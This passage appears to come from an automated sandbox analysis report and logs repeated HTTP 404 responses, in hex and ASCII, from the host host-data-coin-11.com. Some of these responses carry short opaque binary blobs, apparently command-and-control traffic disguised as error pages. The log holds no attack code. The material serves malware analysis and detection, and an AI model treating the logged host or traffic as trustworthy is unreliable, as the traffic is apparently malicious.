2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 